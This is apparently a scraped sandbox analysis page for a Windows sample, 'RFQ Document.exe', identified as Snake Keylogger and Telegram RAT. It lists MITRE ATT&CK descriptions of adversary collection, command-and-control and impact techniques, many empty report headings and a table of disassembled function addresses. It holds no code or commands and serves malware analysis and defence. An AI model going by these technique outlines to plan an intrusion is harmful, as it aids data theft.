Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report RFQ Document.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Snake Keylogger

Threatname: Telegram RAT

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Function 0040312A, Relevance: 80.8, APIs: 26, Strings: 20, Instructions: 315
stringfilecomCOMMON

Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 6FD8B472, Relevance: 10.7, APIs: 7, Instructions: 196
filememoryCOMMON

Function 6FD87500, Relevance: 3.2, APIs: 2, Instructions: 168
memoryCOMMONCrypto

Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 0040361A, Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00402C55, Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Function 00402E8E, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174
fileCOMMON

Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00405375, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39
COMMON

Function 6FD8C13F, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 237
processthreadCOMMON

Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 6FD8B070, Relevance: 7.7, APIs: 5, Instructions: 187
fileCOMMON

Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00404802, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478
windowmemoryCOMMONCrypto

Function 00404FF1, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Function 004042C1, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273
stringCOMMON

Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134
comCOMMON

Function 00402671, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Function 00406354, Relevance: .3, Instructions: 334
COMMONCrypto

Function 00406B2B, Relevance: .3, Instructions: 300
COMMONCrypto

Function 6FD8BA6A, Relevance: .3, Instructions: 284
COMMONCrypto

Function 6FD8BA79, Relevance: .3, Instructions: 276
COMMONCrypto

Function 6FD8754F, Relevance: .1, Instructions: 144
COMMONCrypto

Function 6FD8B7B4, Relevance: .0, Instructions: 23
COMMON

Function 6FD8B737, Relevance: .0, Instructions: 7
COMMON

Function 00403FCB, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125
COMMON

Function 00405915, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Function 00405BE9, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197
stringCOMMON

Function 00405E29, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre